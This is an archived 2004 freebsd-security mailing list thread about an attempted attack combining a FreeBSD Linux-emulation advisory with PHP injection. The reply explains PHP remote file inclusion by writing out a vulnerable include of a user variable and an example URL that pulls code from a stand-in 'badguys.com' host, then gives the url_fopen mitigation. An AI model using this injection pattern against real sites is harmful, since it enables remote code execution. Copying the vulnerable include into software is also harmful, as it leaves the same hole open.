Date: Wed, 11 Aug 2004 14:23:58 -0700 From: "Gustavo A. Baratto" <gbaratto@superb.net> To: "Ryan Thompson" <ryan@sasknow.com>, <freebsd-security@freebsd.org> Subject: Re: FreeBSD-SA-04:13.linux in the wild Message-ID: <015701c47fe9$83dc7ff0$9c01a8c0@chivas> References: <20040811145637.R41454@drizzle.sasknow.net>
next in thread | previous in thread | raw e-mail | index | archive | help
I think I may have seen such thing before as well... not a freebsd problem though... It's php's own fault. php comes with url_fopen enabled by default, so if someone write a script.php with something like: include ("$var"); One could call the http://goodguys.com/script.php?var=http://badguys.com/malicious_script.txt the text of malicious_script.php hosted remotely would be included in scrip.php, and any arbitrary code would be executed with www privileges. just disabling url_fopen in php.ini would prevent that. If this is not what you have seen, please, I'd like to know more about it. Thank you ;) ----- Original Message ----- From: "Ryan Thompson" <ryan@sasknow.com> To: <freebsd-security@freebsd.org> Sent: Wednesday, August 11, 2004 2:07 PM Subject: FreeBSD-SA-04:13.linux in the wild > > Has anyone else seen this in the wild? > > We just had an attempted attack yesterday from a live attacker on one of > our machines using this vulnerability. It wasn't all that clever, and > they're long gone, but I *did* manage to catch them in the act and grab > a copy of the binary they tried to run from /tmp/, as well as the PHP > injection code they used to subvert a virtual web site's poorly-written > index.php script to execute commands as a local user. > > Their first order of business was uname -a, and the timing of the > requests appeared to be random and experimental ("cd /tmp; ls -la", a > few times). If any @FreeBSD.org developers would like more information, > I'd be happy to share my findings and log output off-list. > > - Ryan > > -- > Ryan Thompson <ryan@sasknow.com> > > SaskNow Technologies - http://www.sasknow.com > 901-1st Avenue North - Saskatoon, SK - S7K 1Y4 > > Tel: 306-664-3600 Fax: 306-244-7037 Saskatoon > Toll-Free: 877-727-5669 (877-SASKNOW) North America > _______________________________________________ > freebsd-security@freebsd.org mailing list > http://lists.freebsd.org/mailman/listinfo/freebsd-security > To unsubscribe, send any mail to "freebsd-security-unsubscribe@freebsd.org" >
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?015701c47fe9$83dc7ff0$9c01a8c0>